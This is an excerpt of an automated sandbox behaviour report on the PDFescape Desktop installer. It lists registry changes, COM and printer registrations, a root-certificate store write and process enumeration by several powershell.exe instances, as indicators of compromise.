Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{f01fac5d-e5f6-485f-a8c6-27446425998c}\0002 | spoolsv.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 | spoolsv.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID | spoolsv.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A | svchost.exe
Processes: MsiExec.exe, MsiExec.exe, MsiExec.exe, browser_broker.exe, MicrosoftEdge.exe
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8}\Compatibility Flags = "32776" | MsiExec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar | MsiExec.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Toolbar\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462} = 00 | MsiExec.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8} | MsiExec.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\ActiveX Compatibility | MsiExec.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462} = 00 | MsiExec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Toolbar | MsiExec.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdge.exe
-
Modifies data under HKEY_USERS 36 IoCs
Processes: spoolsv.exe, printer-installer-app.exe, msiexec.exe, svchost.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" | spoolsv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | printer-installer-app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\18 | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 | msiexec.exe
Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" | spoolsv.exe
Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" | spoolsv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts | spoolsv.exe
Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" | spoolsv.exe
Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" | spoolsv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop\PDF Printer\ChooseFile = "1" | printer-installer-app.exe
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\17 | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | svchost.exe
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Devices | spoolsv.exe
Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" | spoolsv.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\PDFescape Desktop = "winspool,Ne03:" | spoolsv.exe
Key created | \REGISTRY\USER\.DEFAULT\Printers\DevModePerUser | spoolsv.exe
Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\PDFescape Desktop = "winspool,Ne03:,15,45" | spoolsv.exe
Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" | spoolsv.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" | spoolsv.exe
Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\PDFescape Desktop = "winspool,Ne03:" | spoolsv.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 | msiexec.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" | spoolsv.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" | spoolsv.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\PDFescape Desktop = "winspool,Ne03:,15,45" | spoolsv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop\PDF Printer | printer-installer-app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices | spoolsv.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" | spoolsv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop\PDF Printer\OpenAfterConversion = "1" | printer-installer-app.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices | spoolsv.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts | spoolsv.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" | spoolsv.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts | spoolsv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\PDF Tools AG | spoolsv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop | printer-installer-app.exe
-
Modifies registry class 64 IoCs
Processes: regsvr32.exe, msiexec.exe, MsiExec.exe, updater-ws.exe, MsiExec.exe, MsiExec.exe, ws.exe, MicrosoftEdge.exe, ws.exe, creator-ws.exe, MsiExec.exe, MsiExec.exe, MsiExec.exe, MsiExec.exe, MsiExec.exe, MsiExec.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9981C967-0000-4633-8737-F55C3CC344B0}\TypeLib | regsvr32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Applications\PDFescape Desktop.exe | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktopWordPlugIn.Connect\CurVer | MsiExec.exe
Key created | \REGISTRY\MACHINE\Software\Classes\SystemFileAssociations\.wwf\shell\print.PDFescape Desktop | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CFAEAEBC-97F0-4D09-89C9-B25F882DAB2C}\1.0 | updater-ws.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{681C8342-5595-4C45-A93A-4E6DB6A3999D} | updater-ws.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8}\VersionIndependentProgID\ = "PDFescapeDesktop.PDFActiveDoc" | MsiExec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A92F07A1-0000-40B0-AF9F-CCEFA34AB08E}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | regsvr32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CB4A1779-DC2F-4A26-BC44-29C109F7E72B}\TypeLib\Version = "1.0" | updater-ws.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{50F0F03A-D82F-4234-BA86-167887BB152C}\TypeLib | MsiExec.exe
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9242C198-0000-4F73-935D-1C7905796C67}\Version | regsvr32.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{9E5B6507-754C-4EC8-93B3-F240C0AD05BF}\AccessPermission = 010014804c0000005c000000140000003000000002001c0001000000110014000400000001010000000000100010000002001c0001000000000014000b0000000101000000000001000000000102000000000005200000002002000001020000000000052000000020020000 | ws.exe
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A4CB4452-0000-4D69-B194-10F00E72CF6B}\Version | regsvr32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60E3EBCC127EC014D863DEFE735F7634\ProductIcon = "C:\\Windows\\Installer\\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\\create_icon" | msiexec.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic | MicrosoftEdge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1E81AD0B-0000-4107-9058-7CC9F66ACAA8}\TypeLib | regsvr32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6966A181-FCFE-49A0-84E0-D4A2E2457055}\ = "IActivationBridge" | ws.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A4B3E576-A94E-4868-B58A-A9945E47C203}\VersionIndependentProgID\ = "PDFescapeDesktopWordPlugIn.Connect" | MsiExec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1A4EF6F-2D38-4065-A99E-2908CC9F31DF}\Programmable | creator-ws.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{188419DA-30AB-4A88-BC26-66A045E23263} | regsvr32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{04B2C159-30AC-4E03-A303-00BA4EA26935}\TypeLib\ = "{159B9A1E-E6BA-4134-BBFC-A6C480193408}" | ws.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3C0CF171-88CC-47E5-AB25-C93AFC0E7F9A}\TypeLib\Version = "1.0" | regsvr32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A7F7470C-0000-4762-9613-155654B24238}\InprocServer32 | regsvr32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58996E59-0000-4D4E-8CEE-5B22F2107655}\TypeLib | regsvr32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0179B7E8-0000-48EB-A99B-B1337DEB7F1E}\TypeLib\Version = "1.0" | regsvr32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CB4A1779-DC2F-4A26-BC44-29C109F7E72B}\TypeLib\Version = "1.0" | updater-ws.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktop.PDFPreviewer.1\CLSID\ = "{E6992C88-D2F2-4000-9B5C-C882FFBD5E7C}" | MsiExec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{15D3E51C-9254-4A6F-9677-BC32AC9EB05B}\TypeLib\Version = "1.0" | ws.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462}\Programmable | MsiExec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5F28CBA-CAF7-482E-88FD-437887EB08EF}\ = "StatVersionDll Class" | regsvr32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktop.PDFActiveDoc.1\DocObject\ | MsiExec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F02D9237-5500-4BA6-A926-1B572AEAF3EB}\Programmable | ws.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{90E5A1BE-AB4B-4CF5-B84E-A2C8CFF0DAA5}\ProxyStubClsid32 | ws.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B070A15F-0000-411C-BAA4-424264999487}\Version | regsvr32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\ECAB801F0EC2B7449A35862E10F9B766\main_feature = "product_feature" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CB4A1779-DC2F-4A26-BC44-29C109F7E72B}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | updater-ws.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B123B077-4FE5-4944-82C7-5765380D9783}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | MsiExec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462}\Programmable | MsiExec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7F592843-0000-4833-9F47-F7332F3CB3F8} | regsvr32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\ECAB801F0EC2B7449A35862E10F9B766 | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1B7DE006-0B8A-4120-8C7A-D21622ABBDDA}\1.0\HELPDIR\ = "C:\\Program Files\\PDFescape Desktop\\creator\\plugins\\IEAddin" | MsiExec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{09C4B9DD-0000-459D-934A-25EC1D0B234A}\AppID = "{2BC47158-F746-4E22-B116-D481B09E9674}" | regsvr32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A7F7470C-0000-4762-9613-155654B24238}\Version\ = "1.0" | regsvr32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0D73933D-0000-401D-9F25-5F1614CA7AC3} | regsvr32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pdfescape\URL Protocol | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CFAEAEBC-97F0-4D09-89C9-B25F882DAB2C}\1.0\HELPDIR\ = "C:\\Program Files\\PDFescape Desktop" | updater-ws.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\PDFIEPlugin.DLL\AppID = "{FB32CC69-DCE5-4191-9898-867A1F57CF0F}" | MsiExec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B123B077-4FE5-4944-82C7-5765380D9783}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | MsiExec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{322C09B5-0000-4267-8909-976D51F2FC41}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}" | regsvr32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{159B9A1E-E6BA-4134-BBFC-A6C480193408} | ws.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9E3CC75B-DB58-4223-8D1E-160BBEF0574E}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | ws.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462} | MsiExec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A7F7470C-0000-4762-9613-155654B24238}\InprocServer32\ = "C:\\ProgramData\\PDFescape Desktop\\Installation\\Statistics.dll" | regsvr32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D3C28D54-72B8-4B8D-B204-157EFA9BF3E7}\InprocServer32 | MsiExec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\PDFIEHelper.PDFHelperBHO.1 | MsiExec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B123B077-4FE5-4944-82C7-5765380D9783}\TypeLib | MsiExec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39E42990-0000-4230-9F81-62B537B6B839}\AppID = "{2BC47158-F746-4E22-B116-D481B09E9674}" | regsvr32.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.pdf | MsiExec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{55C109C9-40DA-43D3-AB08-580A8C8C627F}\1.0\FLAGS | creator-ws.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{77A0A704-0000-4B96-B6F6-B635028FDFA4}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | regsvr32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9AF15867-1D90-423B-9853-E99761714165}\VersionIndependentProgID\ = "PDFIEHelper.PDFHelperBHO" | MsiExec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37DD0F6C-0000-46F2-8B21-3E4AB4750AFF}\InprocServer32\ = "C:\\ProgramData\\PDFescape Desktop\\Installation\\Statistics.dll" | regsvr32.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a | MicrosoftEdge.exe
-
Modifies system certificate store
Processes: PDFescape_Desktop_Installer.exe
description | ioc | process
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = <certificate blob> | PDFescape_Desktop_Installer.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | PDFescape_Desktop_Installer.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = <certificate blob> | PDFescape_Desktop_Installer.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = <certificate blob> | PDFescape_Desktop_Installer.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = <certificate blob> | PDFescape_Desktop_Installer.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: PDFescape_Desktop_Installer.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe
pid | process
2824 | PDFescape_Desktop_Installer.exe
2824 | PDFescape_Desktop_Installer.exe
3152 | powershell.exe
3152 | powershell.exe
4144 | powershell.exe
4144 | powershell.exe
4100 | powershell.exe
4100 | powershell.exe
4188 | powershell.exe
4188 | powershell.exe
2184 | powershell.exe
2184 | powershell.exe
3872 | powershell.exe
3872 | powershell.exe
4264 | powershell.exe
4264 | powershell.exe
4332 | powershell.exe
4332 | powershell.exe
4400 | powershell.exe
4400 | powershell.exe
4480 | powershell.exe
4480 | powershell.exe
